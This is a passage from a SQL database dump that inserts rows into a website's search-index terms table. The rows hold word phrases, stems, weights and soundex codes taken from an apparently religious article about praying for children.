(215745, 'samson missed it', 'samson missed it', 0, 1, 1.5333, 'S52523', 1, '*'),
(215746, 'samuel 2', 'samuel 2', 0, 1, 1.2667, 'S540', 2, '*'),
(215747, 'samuel 2 22', 'samuel 2 22', 0, 1, 1.3667, 'S540', 1, '*'),
(215748, 'saying in', 'sai in', 0, 1, 1.3, 'S525', 1, '*'),
(215749, 'saying in south', 'sai in south', 0, 1, 1.5, 'S52523', 1, '*'),
(215750, 'scatter', 'scatter', 0, 0, 0.4667, 'S360', 1, '*'),
(215751, 'scatter all', 'scatter all', 0, 1, 1.3667, 'S364', 1, '*'),
(215752, 'scatter all your', 'scatter all your', 0, 1, 1.5333, 'S3646', 1, '*'),
(215753, 'school you', 'school you', 0, 1, 1.3333, 'S400', 1, '*'),
(215754, 'school you almost', 'school you almost', 0, 1, 1.5667, 'S4523', 1, '*'),
(215755, 'seemed', 'seem', 0, 0, 0.4, 'S530', 1, '*'),
(215756, 'seemed good', 'seem good', 0, 1, 1.3667, 'S5323', 1, '*'),
(215757, 'seemed good to', 'seem good to', 0, 1, 1.4667, 'S5323', 1, '*'),
(215758, 'separate between', 'separ between', 0, 1, 1.5333, 'S163135', 1, '*'),
(215759, 'separate between right', 'separ between right', 0, 1, 1.7333, 'S163135623', 1, '*'),
(215760, 'seven', 'seven', 0, 0, 0.3333, 'S150', 4, '*'),
(215761, 'seven scriptural', 'seven scriptural', 0, 1, 1.5333, 'S15261364', 1, '*'),
(215762, 'seven scriptural prayers', 'seven scriptural prayers', 0, 1, 1.8, 'S15261364162', 1, '*'),
(215763, 'shield of', 'shield of', 0, 1, 1.3, 'S431', 1, '*'),
(215764, 'shield of favour', 'shield of favour', 0, 1, 1.5333, 'S4316', 1, '*'),
(215765, 'shield your', 'shield your', 0, 1, 1.3667, 'S436', 1, '*'),
(215766, 'shield your child', 'shield your child', 0, 1, 1.5667, 'S436243', 1, '*'),
(215767, 'should also', 'should also', 0, 1, 1.3667, 'S4342', 1, '*'),
(215768, 'should also surround', 'should also surround', 0, 1, 1.6667, 'S4342653', 1, '*'),
(215769, 'should you pray', 'should you pray', 0, 1, 1.5, 'S4316', 1, '*'),
(215770, 'sodom', 'sodom', 0, 0, 0.3333, 'S350', 1, '*'),
(215771, 'sodom and', 'sodom and', 0, 1, 1.3, 'S353', 1, '*'),
(215772, 'sodom and gomorrah', 'sodom and gomorrah', 0, 1, 1.6, 'S353256', 1, '*'),
(215773, 'somebody somewhere', 'somebodi somewhere', 0, 1, 1.6, 'S513256', 1, '*'),
(215774, 'somebody somewhere will', 'somebodi somewhere will', 0, 1, 1.7667, 'S5132564', 1, '*'),
(215775, 'somewhere will', 'somewher will', 0, 1, 1.4667, 'S564', 1, '*'),
(215776, 'somewhere will treat', 'somewher will treat', 0, 1, 1.6667, 'S564363', 1, '*'),
(215777, 'sound and', 'sound and', 0, 1, 1.3, 'S5353', 1, '*'),
(215778, 'sound and great', 'sound and great', 0, 1, 1.5, 'S5353263', 1, '*'),
(215779, 'south', 'south', 0, 0, 0.3333, 'S300', 1, '*'),
(215780, 'south west', 'south west', 0, 1, 1.3333, 'S323', 1, '*'),
(215781, 'south west nigeria', 'south west nigeria', 0, 1, 1.6, 'S323526', 1, '*'),
(215782, 'spiritual life a', 'spiritu life a', 0, 1, 1.5333, 'S16341', 1, '*'),
(215783, 'spiritual life from', 'spiritu life from', 0, 1, 1.6333, 'S1634165', 1, '*'),
(215784, 'start that', 'start that', 0, 1, 1.3333, 'S363', 1, '*'),
(215785, 'start that prayer', 'start that prayer', 0, 1, 1.5667, 'S36316', 1, '*'),
(215786, 'started down', 'start down', 0, 1, 1.4, 'S3635', 1, '*'),
(215787, 'started down the', 'start down the', 0, 1, 1.5333, 'S36353', 1, '*'),
(215788, 'stop your', 'stop your', 0, 1, 1.3, 'S316', 1, '*'),
(215789, 'stop your child', 'stop your child', 0, 1, 1.5, 'S316243', 1, '*'),
(215790, 'strength or', 'strength or', 0, 1, 1.3667, 'S365236', 1, '*'),
(215791, 'strength or effort', 'strength or effort', 0, 1, 1.6, 'S365236163', 1, '*'),
(215792, 'submitting', 'submit', 0, 0, 0.6667, 'S15352', 1, '*'),
(215793, 'submitting an', 'submit an', 0, 1, 1.4333, 'S153525', 1, '*'),
(215794, 'submitting an assignment', 'submit an assignment', 0, 1, 1.8, 'S153525253', 1, '*'),
(215795, 'success pray', 'success pray', 0, 1, 1.4, 'S160', 1, '*'),
(215796, 'success pray for', 'success pray for', 0, 1, 1.5333, 'S1616', 1, '*'),
(215797, 'surround', 'surround', 0, 0, 0.5333, 'S653', 1, '*'),
(215798, 'surround them', 'surround them', 0, 1, 1.4333, 'S6535', 1, '*'),
(215799, 'surround them with', 'surround them with', 0, 1, 1.6, 'S65353', 1, '*'),
(215800, 'surround your', 'surround your', 0, 1, 1.4333, 'S6536', 1, '*'),
(215801, 'surround your children', 'surround your children', 0, 1, 1.7333, 'S653624365', 1, '*'),
(215802, 'takes to', 'take to', 0, 1, 1.2667, 'T230', 1, '*'),
(215803, 'takes to destroy', 'take to destroy', 0, 1, 1.5333, 'T23236', 1, '*'),
(215804, 'text 1', 'text 1', 0, 1, 1.2, 'T230', 1, '*'),
(215805, 'text 1 samuel', 'text 1 samuel', 0, 1, 1.4333, 'T23254', 1, '*'),
(215806, 'that a shield', 'that a shield', 0, 1, 1.4333, 'T243', 1, '*'),
(215807, 'that are the', 'that are the', 0, 1, 1.4, 'T630', 1, '*'),
(215808, 'that no negative', 'that no negative', 0, 1, 1.5333, 'T5231', 1, '*'),
(215809, 'that prayer', 'that prayer', 0, 1, 1.3667, 'T160', 1, '*'),
(215810, 'that prayer by', 'that prayer by', 0, 1, 1.4667, 'T161', 1, '*'),
(215811, 'that somebody', 'that somebody', 0, 1, 1.4333, 'T2513', 1, '*'),
(215812, 'that somebody somewhere', 'that somebody somewhere', 0, 1, 1.7667, 'T2513256', 1, '*'),
(215813, 'that the blood', 'that the blood', 0, 1, 1.4667, 'T143', 1, '*'),
(215814, 'that there are', 'that there are', 0, 1, 1.4667, 'T600', 1, '*'),
(215815, 'that we always', 'that we always', 0, 1, 1.4667, 'T420', 1, '*'),
(215816, 'that where', 'that where', 0, 1, 1.3333, 'T600', 1, '*'),
(215817, 'that where the', 'that where the', 0, 1, 1.4667, 'T630', 1, '*'),
(215818, 'that will form', 'that will form', 0, 1, 1.4667, 'T4165', 1, '*'),
(215819, 'the arrow', 'the arrow', 0, 1, 1.3, 'T600', 1, '*'),
(215820, 'the arrow head', 'the arrow head', 0, 1, 1.4667, 'T630', 1, '*'),
(215821, 'the books god\'s', 'the books god', 0, 1, 1.5, 'T1232', 1, '*'),
(215822, 'the devil will', 'the devil will', 0, 1, 1.4667, 'T140', 3, '*'),
(215823, 'the divine', 'the divine', 0, 1, 1.3333, 'T150', 2, '*'),
(215824, 'the divine plan', 'the divine plan', 0, 1, 1.5, 'T15145', 1, '*'),
(215825, 'the enemy lot', 'the enemy lot', 0, 1, 1.4333, 'T543', 1, '*'),
(215826, 'the eyes of', 'the eyes of', 0, 1, 1.3667, 'T210', 1, '*'),
(215827, 'the flows', 'the flows', 0, 1, 1.3, 'T142', 1, '*'),
(215828, 'the flows in', 'the flows in', 0, 1, 1.4, 'T1425', 1, '*'),
(215829, 'the future his', 'the future his', 0, 1, 1.4667, 'T1362', 1, '*'),
(215830, 'the greatest', 'the greatest', 0, 1, 1.4, 'T26323', 3, '*'),
(215831, 'the greatest gift', 'the greatest gift', 0, 1, 1.5667, 'T26323213', 1, '*'),
(215832, 'the greatest inheritance', 'the greatest inheritance', 0, 1, 1.8, 'T2632356352', 1, '*'),
(215833, 'the instructions', 'the instructions', 0, 1, 1.5333, 'T52362352', 3, '*'),
(215834, 'the instructions but', 'the instructions but', 0, 1, 1.6667, 'T5236235213', 1, '*'),
(215835, 'the issues', 'the issues', 0, 1, 1.3333, 'T200', 1, '*'),
(215836, 'the issues they', 'the issues they', 0, 1, 1.5, 'T230', 1, '*'),
(215837, 'the lord of', 'the lord of', 0, 1, 1.3667, 'T4631', 1, '*'),
(215838, 'the lord will', 'the lord will', 0, 1, 1.4333, 'T4634', 1, '*'),
(215839, 'the negative', 'the negative', 0, 1, 1.4, 'T5231', 1, '*'),
(215840, 'the negative ancestral', 'the negative ancestral', 0, 1, 1.7333, 'T523152364', 1, '*'),
(215841, 'the negative female', 'the negative female', 0, 1, 1.6333, 'T523154', 1, '*'),
(215842, 'the principal', 'the principal', 0, 1, 1.4333, 'T165214', 1, '*'),
(215843, 'the principal of', 'the principal of', 0, 1, 1.5333, 'T1652141', 1, '*'),
(215844, 'the purpose', 'the purpose', 0, 1, 1.3667, 'T1612', 2, '*'),
(215845, 'the purpose of', 'the purpose of', 0, 1, 1.4667, 'T16121', 2, '*'),
(215846, 'the right relationships', 'the right relationships', 0, 1, 1.7667, 'T6236435212', 1, '*'),
(215847, 'the road where', 'the road where', 0, 1, 1.4667, 'T636', 1, '*'),
(215848, 'the time comes', 'the time comes', 0, 1, 1.4667, 'T5252', 1, '*'),
(215849, 'the values', 'the values', 0, 1, 1.3333, 'T142', 1, '*'),
(215850, 'the values that', 'the values that', 0, 1, 1.5, 'T1423', 1, '*'),
(215851, 'their aunt', 'their aunt', 0, 1, 1.3333, 'T653', 1, '*'),
(215852, 'their aunt is', 'their aunt is', 0, 1, 1.4333, 'T6532', 1, '*'),
(215853, 'their cousins', 'their cousins', 0, 1, 1.4333, 'T6252', 1, '*'),
(215854, 'their cousins and', 'their cousins and', 0, 1, 1.5667, 'T625253', 1, '*'),
(215855, 'their experiences', 'their experiences', 0, 1, 1.5667, 'T621652', 1, '*'),
(215856, 'their experiences and', 'their experiences and', 0, 1, 1.7, 'T62165253', 1, '*'),
(215857, 'their future', 'their future', 0, 1, 1.4, 'T6136', 1, '*'),
(215858, 'their future all', 'their future all', 0, 1, 1.5333, 'T61364', 1, '*'),
(215859, 'their journey', 'their journey', 0, 1, 1.4333, 'T6265', 1, '*'),
(215860, 'their journey and', 'their journey and', 0, 1, 1.5667, 'T62653', 1, '*'),
(215861, 'their lives', 'their lives', 0, 1, 1.3667, 'T6412', 7, '*'),
(215862, 'their lives and', 'their lives and', 0, 1, 1.5, 'T641253', 1, '*'),
(215863, 'their lives if', 'their lives if', 0, 1, 1.4667, 'T64121', 1, '*'),
(215864, 'their lives is', 'their lives is', 0, 1, 1.4667, 'T6412', 1, '*'),
(215865, 'their lives they', 'their lives they', 0, 1, 1.5333, 'T64123', 3, '*'),
(215866, 'their parents remember', 'their parents remember', 0, 1, 1.7333, 'T6165326516', 1, '*'),
(215867, 'their philosophy', 'their philosophy', 0, 1, 1.5333, 'T61421', 1, '*'),
(215868, 'their philosophy is', 'their philosophy is', 0, 1, 1.6333, 'T614212', 1, '*'),
(215869, 'their relationship', 'their relationship', 0, 1, 1.6, 'T643521', 1, '*'),
(215870, 'their relationship with', 'their relationship with', 0, 1, 1.7667, 'T6435213', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(215871, 'their success', 'their success', 0, 1, 1.4333, 'T620', 1, '*'),
(215872, 'their success pray', 'their success pray', 0, 1, 1.6, 'T6216', 1, '*'),
(215873, 'them but', 'them but', 0, 1, 1.2667, 'T513', 1, '*'),
(215874, 'them but who', 'them but who', 0, 1, 1.4, 'T513', 1, '*'),
(215875, 'them down', 'them down', 0, 1, 1.3, 'T535', 1, '*'),
(215876, 'them down and', 'them down and', 0, 1, 1.4333, 'T5353', 1, '*'),
(215877, 'them if', 'them if', 0, 1, 1.2333, 'T510', 1, '*'),
(215878, 'them if you', 'them if you', 0, 1, 1.3667, 'T510', 1, '*'),
(215879, 'them like', 'them like', 0, 1, 1.3, 'T542', 1, '*'),
(215880, 'them like you', 'them like you', 0, 1, 1.4333, 'T542', 1, '*'),
(215881, 'them or', 'them or', 0, 1, 1.2333, 'T560', 1, '*'),
(215882, 'them or even', 'them or even', 0, 1, 1.4, 'T5615', 1, '*'),
(215883, 'them protection', 'them protection', 0, 1, 1.5, 'T5163235', 1, '*'),
(215884, 'them protection in', 'them protection in', 0, 1, 1.6, 'T5163235', 1, '*'),
(215885, 'them that', 'them that', 0, 1, 1.3, 'T530', 1, '*'),
(215886, 'them that they', 'them that they', 0, 1, 1.4667, 'T530', 1, '*'),
(215887, 'them to enjoy', 'them to enjoy', 0, 1, 1.4333, 'T5352', 1, '*'),
(215888, 'them to his', 'them to his', 0, 1, 1.3667, 'T532', 1, '*'),
(215889, 'them to make', 'them to make', 0, 1, 1.4, 'T5352', 1, '*'),
(215890, 'them with', 'them with', 0, 1, 1.3, 'T530', 1, '*'),
(215891, 'them with prayer', 'them with prayer', 0, 1, 1.5333, 'T5316', 1, '*'),
(215892, 'there are 7', 'there are 7', 0, 1, 1.3667, 'T600', 1, '*'),
(215893, 'there protection', 'there protection', 0, 1, 1.5333, 'T6163235', 1, '*'),
(215894, 'there protection is', 'there protection is', 0, 1, 1.6333, 'T61632352', 1, '*'),
(215895, 'there will always', 'there will always', 0, 1, 1.5667, 'T642', 1, '*'),
(215896, 'there with', 'there with', 0, 1, 1.3333, 'T630', 1, '*'),
(215897, 'there with them', 'there with them', 0, 1, 1.5, 'T635', 1, '*'),
(215898, 'therefore pray', 'therefor pray', 0, 1, 1.4667, 'T61616', 1, '*'),
(215899, 'therefore pray for', 'therefor pray for', 0, 1, 1.6, 'T6161616', 1, '*'),
(215900, 'these choices', 'these choices', 0, 1, 1.4333, 'T200', 1, '*'),
(215901, 'these choices they', 'these choices they', 0, 1, 1.6, 'T230', 1, '*'),
(215902, 'they all', 'thei all', 0, 1, 1.2667, 'T400', 2, '*'),
(215903, 'they all grow', 'thei all grow', 0, 1, 1.4333, 'T426', 1, '*'),
(215904, 'they are but', 'thei are but', 0, 1, 1.4, 'T613', 1, '*'),
(215905, 'they are confronted', 'thei are confronted', 0, 1, 1.6333, 'T6251653', 1, '*'),
(215906, 'they are old', 'thei are old', 0, 1, 1.4, 'T643', 1, '*'),
(215907, 'they are to', 'thei are to', 0, 1, 1.3667, 'T630', 1, '*'),
(215908, 'they are young', 'thei are young', 0, 1, 1.4667, 'T652', 1, '*'),
(215909, 'they can go', 'thei can go', 0, 1, 1.3667, 'T252', 1, '*'),
(215910, 'they can have', 'thei can have', 0, 1, 1.4333, 'T251', 1, '*'),
(215911, 'they turn', 'thei turn', 0, 1, 1.3, 'T650', 1, '*'),
(215912, 'they turn out', 'thei turn out', 0, 1, 1.4333, 'T653', 1, '*'),
(215913, 'they will choose', 'thei will choose', 0, 1, 1.5333, 'T420', 1, '*'),
(215914, 'they will connect', 'thei will connect', 0, 1, 1.5667, 'T42523', 1, '*'),
(215915, 'they will escape', 'thei will escape', 0, 1, 1.5333, 'T421', 1, '*'),
(215916, 'they will meet', 'thei will meet', 0, 1, 1.4667, 'T453', 1, '*'),
(215917, 'they will need', 'thei will need', 0, 1, 1.4667, 'T453', 1, '*'),
(215918, 'they will turn', 'thei will turn', 0, 1, 1.4667, 'T4365', 1, '*'),
(215919, 'things in', 'thing in', 0, 1, 1.3, 'T525', 1, '*'),
(215920, 'things in your', 'thing in your', 0, 1, 1.4667, 'T5256', 1, '*'),
(215921, 'those flows', 'those flows', 0, 1, 1.3667, 'T2142', 1, '*'),
(215922, 'those flows in', 'those flows in', 0, 1, 1.4667, 'T21425', 1, '*'),
(215923, 'those people', 'those people', 0, 1, 1.4, 'T214', 1, '*'),
(215924, 'those people and', 'those people and', 0, 1, 1.5333, 'T21453', 1, '*'),
(215925, 'those people not', 'those people not', 0, 1, 1.5333, 'T21453', 1, '*'),
(215926, 'those things in', 'those things in', 0, 1, 1.5, 'T23525', 1, '*'),
(215927, 'through life they', 'through life they', 0, 1, 1.5667, 'T62413', 1, '*'),
(215928, 'time comes', 'time comes', 0, 1, 1.3333, 'T5252', 1, '*'),
(215929, 'time comes for', 'time comes for', 0, 1, 1.4667, 'T525216', 1, '*'),
(215930, 'time where', 'time where', 0, 1, 1.3333, 'T560', 1, '*'),
(215931, 'time where you', 'time where you', 0, 1, 1.4667, 'T560', 1, '*'),
(215932, 'times you', 'time you', 0, 1, 1.3, 'T520', 1, '*'),
(215933, 'times you speak', 'time you speak', 0, 1, 1.5, 'T5212', 1, '*'),
(215934, 'to activate', 'to activate', 0, 1, 1.3667, 'T2313', 3, '*'),
(215935, 'to activate those', 'to activate those', 0, 1, 1.5667, 'T23132', 3, '*'),
(215936, 'to be very', 'to be very', 0, 1, 1.3333, 'T160', 1, '*'),
(215937, 'to become victorious', 'to become victorious', 0, 1, 1.6667, 'T12512362', 1, '*'),
(215938, 'to destroy', 'to destroy', 0, 1, 1.3333, 'T236', 1, '*'),
(215939, 'to destroy your', 'to destroy your', 0, 1, 1.5, 'T236', 1, '*'),
(215940, 'to enjoy favour', 'to enjoy favour', 0, 1, 1.5, 'T5216', 1, '*'),
(215941, 'to go and', 'to go and', 0, 1, 1.3, 'T253', 1, '*'),
(215942, 'to have favour', 'to have favour', 0, 1, 1.4667, 'T160', 1, '*'),
(215943, 'to have good', 'to have good', 0, 1, 1.4, 'T123', 1, '*'),
(215944, 'to have one', 'to have one', 0, 1, 1.3667, 'T150', 1, '*'),
(215945, 'to his eyes', 'to his eyes', 0, 1, 1.3667, 'T200', 1, '*'),
(215946, 'to his hands', 'to his hands', 0, 1, 1.4, 'T2532', 1, '*'),
(215947, 'to judge and', 'to judge and', 0, 1, 1.4, 'T23253', 1, '*'),
(215948, 'to make right', 'to make right', 0, 1, 1.4333, 'T52623', 1, '*'),
(215949, 'to make these', 'to make these', 0, 1, 1.4333, 'T5232', 1, '*'),
(215950, 'to separate', 'to separate', 0, 1, 1.3667, 'T2163', 1, '*'),
(215951, 'to separate between', 'to separate between', 0, 1, 1.6333, 'T2163135', 1, '*'),
(215952, 'to the divine', 'to the divine', 0, 1, 1.4333, 'T150', 1, '*'),
(215953, 'to them but', 'to them but', 0, 1, 1.3667, 'T513', 1, '*'),
(215954, 'to where they', 'to where they', 0, 1, 1.4333, 'T630', 1, '*'),
(215955, 'today plead', 'todai plead', 0, 1, 1.3667, 'T143', 1, '*'),
(215956, 'today plead the', 'todai plead the', 0, 1, 1.5, 'T143', 1, '*'),
(215957, 'treat our', 'treat our', 0, 1, 1.3, 'T636', 1, '*'),
(215958, 'treat our children', 'treat our children', 0, 1, 1.6, 'T63624365', 1, '*'),
(215959, 'treat them', 'treat them', 0, 1, 1.3333, 'T635', 1, '*'),
(215960, 'treat them like', 'treat them like', 0, 1, 1.5, 'T63542', 1, '*'),
(215961, 'treat them or', 'treat them or', 0, 1, 1.4333, 'T6356', 1, '*'),
(215962, 'treated', 'treat', 0, 0, 0.4667, 'T630', 1, '*'),
(215963, 'treated the', 'treat the', 0, 1, 1.3667, 'T630', 1, '*'),
(215964, 'treated the way', 'treat the way', 0, 1, 1.5, 'T630', 1, '*'),
(215965, 'treated them', 'treat them', 0, 1, 1.4, 'T635', 1, '*'),
(215966, 'treated them or', 'treat them or', 0, 1, 1.5, 'T6356', 1, '*'),
(215967, 'turn out', 'turn out', 0, 1, 1.2667, 'T653', 1, '*'),
(215968, 'turn out according', 'turn out according', 0, 1, 1.6, 'T65326352', 1, '*'),
(215969, 'turn out remember', 'turn out remember', 0, 1, 1.5667, 'T6536516', 1, '*'),
(215970, 'understand why', 'understand why', 0, 1, 1.4667, 'U5362353', 1, '*'),
(215971, 'understand why other', 'understand why other', 0, 1, 1.6667, 'U53623536', 1, '*'),
(215972, 'understand why your', 'understand why your', 0, 1, 1.6333, 'U53623536', 1, '*'),
(215973, 'up because', 'up because', 0, 1, 1.3333, 'U120', 1, '*'),
(215974, 'up because there', 'up because there', 0, 1, 1.5333, 'U1236', 1, '*'),
(215975, 'up is the', 'up is the', 0, 1, 1.3, 'U123', 1, '*'),
(215976, 'values that', 'valu that', 0, 1, 1.3667, 'V423', 1, '*'),
(215977, 'values that will', 'valu that will', 0, 1, 1.5333, 'V4234', 1, '*'),
(215978, 'very important', 'veri important', 0, 1, 1.4667, 'V6516353', 2, '*'),
(215979, 'very important prayer', 'veri important prayer', 0, 1, 1.7, 'V651635316', 1, '*'),
(215980, 'very important that', 'veri important that', 0, 1, 1.6333, 'V6516353', 2, '*'),
(215981, 'victorious', 'victori', 0, 0, 0.6667, 'V2362', 1, '*'),
(215982, 'victorious children', 'victori children', 0, 1, 1.6333, 'V23624365', 1, '*'),
(215983, 'victorious in', 'victori in', 0, 1, 1.4333, 'V23625', 1, '*'),
(215984, 'victorious in life', 'victori in life', 0, 1, 1.6, 'V2362541', 1, '*'),
(215985, 'want to go', 'want to go', 0, 1, 1.3333, 'W532', 1, '*'),
(215986, 'was a bit', 'wa a bit', 0, 1, 1.3, 'W213', 1, '*'),
(215987, 'way you would', 'wai you would', 0, 1, 1.4333, 'W430', 1, '*'),
(215988, 'we always', 'we always', 0, 1, 1.3, 'W420', 1, '*'),
(215989, 'we always treat', 'we always treat', 0, 1, 1.5, 'W42363', 1, '*'),
(215990, 'west', 'west', 0, 0, 0.2667, 'W230', 1, '*'),
(215991, 'west nigeria', 'west nigeria', 0, 1, 1.4, 'W23526', 1, '*'),
(215992, 'west nigeria that', 'west nigeria that', 0, 1, 1.5667, 'W235263', 1, '*'),
(215993, 'what determines the', 'what determines the', 0, 1, 1.6333, 'W36523', 1, '*'),
(215994, 'what is wrong', 'what is wrong', 0, 1, 1.4333, 'W32652', 1, '*'),
(215995, 'what seemed', 'what seemed', 0, 1, 1.3667, 'W3253', 1, '*'),
(215996, 'what seemed good', 'what seemed good', 0, 1, 1.5333, 'W325323', 1, '*'),
(215997, 'when the issues', 'when the issues', 0, 1, 1.5, 'W532', 1, '*'),
(215998, 'when the time', 'when the time', 0, 1, 1.4333, 'W535', 1, '*'),
(215999, 'when they are', 'when they are', 0, 1, 1.4333, 'W536', 1, '*'),
(216000, 'where brilliance', 'where brilliance', 0, 1, 1.5333, 'W616452', 1, '*'),
(216001, 'where brilliance strength', 'where brilliance strength', 0, 1, 1.8333, 'W61645236523', 1, '*'),
(216002, 'where he', 'where he', 0, 1, 1.2667, 'W600', 1, '*'),
(216003, 'where he lost', 'where he lost', 0, 1, 1.4333, 'W6423', 1, '*'),
(216004, 'where the', 'where the', 0, 1, 1.3, 'W630', 1, '*'),
(216005, 'where the eyes', 'where the eyes', 0, 1, 1.4667, 'W632', 1, '*'),
(216006, 'where they are', 'where they are', 0, 1, 1.4667, 'W636', 1, '*'),
(216007, 'where you cannot', 'where you cannot', 0, 1, 1.5333, 'W6253', 1, '*'),
(216008, 'whether they', 'whether they', 0, 1, 1.4, 'W363', 1, '*'),
(216009, 'whether they are', 'whether they are', 0, 1, 1.5333, 'W3636', 1, '*'),
(216010, 'white they', 'white they', 0, 1, 1.3333, 'W300', 1, '*'),
(216011, 'white they can', 'white they can', 0, 1, 1.4667, 'W325', 1, '*'),
(216012, 'who is the', 'who is the', 0, 1, 1.3333, 'W230', 1, '*'),
(216013, 'why other', 'why other', 0, 1, 1.3, 'W360', 1, '*'),
(216014, 'why other children', 'why other children', 0, 1, 1.6, 'W3624365', 1, '*'),
(216015, 'why your', 'why your', 0, 1, 1.2667, 'W600', 2, '*'),
(216016, 'why your own', 'why your own', 0, 1, 1.4, 'W650', 1, '*'),
(216017, 'wife children', 'wife children', 0, 1, 1.4333, 'W124365', 1, '*'),
(216018, 'wife children and', 'wife children and', 0, 1, 1.5667, 'W1243653', 1, '*'),
(216019, 'will agree', 'will agree', 0, 1, 1.3333, 'W426', 1, '*'),
(216020, 'will agree that', 'will agree that', 0, 1, 1.5, 'W4263', 1, '*'),
(216021, 'will always be', 'will always be', 0, 1, 1.4667, 'W421', 3, '*'),
(216022, 'will be treated', 'will be treated', 0, 1, 1.5, 'W41363', 1, '*'),
(216023, 'will choose', 'will choose', 0, 1, 1.3667, 'W420', 1, '*'),
(216024, 'will choose right', 'will choose right', 0, 1, 1.5667, 'W42623', 1, '*'),
(216025, 'will connect to', 'will connect to', 0, 1, 1.5, 'W42523', 1, '*'),
(216026, 'will creep', 'will creep', 0, 1, 1.3333, 'W4261', 1, '*'),
(216027, 'will creep into', 'will creep into', 0, 1, 1.5, 'W426153', 1, '*'),
(216028, 'will determine their', 'will determine their', 0, 1, 1.6667, 'W436536', 1, '*'),
(216029, 'will escape', 'will escape', 0, 1, 1.3667, 'W421', 1, '*'),
(216030, 'will escape all', 'will escape all', 0, 1, 1.5, 'W4214', 1, '*'),
(216031, 'will form', 'will form', 0, 1, 1.3, 'W4165', 1, '*'),
(216032, 'will form their', 'will form their', 0, 1, 1.5, 'W416536', 1, '*'),
(216033, 'will help preserve', 'will help preserve', 0, 1, 1.6, 'W416261', 1, '*'),
(216034, 'will meet', 'will meet', 0, 1, 1.3, 'W453', 1, '*'),
(216035, 'will meet and', 'will meet and', 0, 1, 1.4333, 'W45353', 1, '*'),
(216036, 'will need favour', 'will need favour', 0, 1, 1.5333, 'W45316', 1, '*'),
(216037, 'will not determine', 'will not determine', 0, 1, 1.6, 'W45365', 1, '*'),
(216038, 'will not reach', 'will not reach', 0, 1, 1.4667, 'W45362', 1, '*'),
(216039, 'will surround', 'will surround', 0, 1, 1.4333, 'W42653', 1, '*'),
(216040, 'will surround your', 'will surround your', 0, 1, 1.6, 'W426536', 1, '*'),
(216041, 'will treat', 'will treat', 0, 1, 1.3333, 'W4363', 1, '*'),
(216042, 'will treat them', 'will treat them', 0, 1, 1.5, 'W43635', 1, '*'),
(216043, 'will turn', 'will turn', 0, 1, 1.3, 'W4365', 2, '*'),
(216044, 'will turn out', 'will turn out', 0, 1, 1.4333, 'W43653', 1, '*'),
(216045, 'with are', 'with are', 0, 1, 1.2667, 'W360', 1, '*'),
(216046, 'with are not', 'with are not', 0, 1, 1.4, 'W3653', 1, '*'),
(216047, 'with extra', 'with extra', 0, 1, 1.3333, 'W3236', 1, '*'),
(216048, 'with extra care', 'with extra care', 0, 1, 1.5, 'W323626', 1, '*'),
(216049, 'with god what', 'with god what', 0, 1, 1.4333, 'W323', 1, '*'),
(216050, 'with people they', 'with people they', 0, 1, 1.5333, 'W3143', 1, '*'),
(216051, 'with prayer', 'with prayer', 0, 1, 1.3667, 'W316', 1, '*'),
(216052, 'with prayer your', 'with prayer your', 0, 1, 1.5333, 'W316', 1, '*'),
(216053, 'with prayers', 'with prayers', 0, 1, 1.4, 'W3162', 1, '*'),
(216054, 'with prayers lastly', 'with prayers lastly', 0, 1, 1.6333, 'W31624234', 1, '*'),
(216055, 'with the enemy', 'with the enemy', 0, 1, 1.4667, 'W350', 1, '*'),
(216056, 'with them if', 'with them if', 0, 1, 1.4, 'W351', 1, '*'),
(216057, 'work pray', 'work pray', 0, 1, 1.3, 'W6216', 1, '*'),
(216058, 'work pray for', 'work pray for', 0, 1, 1.4333, 'W621616', 1, '*'),
(216059, 'would have treated', 'would have treated', 0, 1, 1.6, 'W431363', 1, '*'),
(216060, 'written in', 'written in', 0, 1, 1.3333, 'W635', 1, '*'),
(216061, 'written in black', 'written in black', 0, 1, 1.5333, 'W635142', 1, '*'),
(216062, 'wrong relationships that', 'wrong relationships that', 0, 1, 1.8, 'W65264352123', 1, '*'),
(216063, 'wrong such', 'wrong such', 0, 1, 1.3333, 'W652', 1, '*'),
(216064, 'wrong such that', 'wrong such that', 0, 1, 1.5, 'W6523', 1, '*'),
(216065, 'wrong the', 'wrong the', 0, 1, 1.3, 'W6523', 1, '*'),
(216066, 'wrong the greatest', 'wrong the greatest', 0, 1, 1.6, 'W652326323', 1, '*'),
(216067, 'you almost', 'you almost', 0, 1, 1.3333, 'Y4523', 1, '*'),
(216068, 'you almost always', 'you almost always', 0, 1, 1.5667, 'Y452342', 1, '*'),
(216069, 'you can give', 'you can give', 0, 1, 1.4, 'Y2521', 1, '*'),
(216070, 'you can leave', 'you can leave', 0, 1, 1.4333, 'Y2541', 1, '*'),
(216071, 'you can shield', 'you can shield', 0, 1, 1.4667, 'Y25243', 1, '*'),
(216072, 'you can\'t replace', 'you can replace', 0, 1, 1.5667, 'Y2536142', 1, '*'),
(216073, 'you can\'t stop', 'you can stop', 0, 1, 1.4667, 'Y253231', 1, '*'),
(216074, 'you cannot get', 'you cannot get', 0, 1, 1.4667, 'Y25323', 1, '*'),
(216075, 'you commit', 'you commit', 0, 1, 1.3333, 'Y253', 1, '*'),
(216076, 'you commit them', 'you commit them', 0, 1, 1.5, 'Y2535', 1, '*'),
(216077, 'you don\'t understand', 'you don understand', 0, 1, 1.6667, 'Y3535362353', 1, '*'),
(216078, 'you have laboured', 'you have laboured', 0, 1, 1.5667, 'Y14163', 1, '*'),
(216079, 'you must start', 'you must start', 0, 1, 1.4667, 'Y5232363', 1, '*'),
(216080, 'you never', 'you never', 0, 1, 1.3, 'Y516', 1, '*'),
(216081, 'you never get', 'you never get', 0, 1, 1.4333, 'Y51623', 1, '*'),
(216082, 'you pray', 'you pray', 0, 1, 1.2667, 'Y160', 1, '*'),
(216083, 'you pray for', 'you pray for', 0, 1, 1.4, 'Y1616', 1, '*'),
(216084, 'you should also', 'you should also', 0, 1, 1.5, 'Y24342', 1, '*'),
(216085, 'you speak to', 'you speak to', 0, 1, 1.4, 'Y2123', 1, '*'),
(216086, 'you will agree', 'you will agree', 0, 1, 1.4667, 'Y426', 1, '*'),
(216087, 'you will treat', 'you will treat', 0, 1, 1.4667, 'Y4363', 1, '*'),
(216088, 'young and growing', 'young and growing', 0, 1, 1.5667, 'Y52532652', 1, '*'),
(216089, 'your child', 'your child', 0, 1, 1.3333, 'Y6243', 1, '*'),
(216090, 'your child and', 'your child and', 0, 1, 1.4667, 'Y624353', 1, '*'),
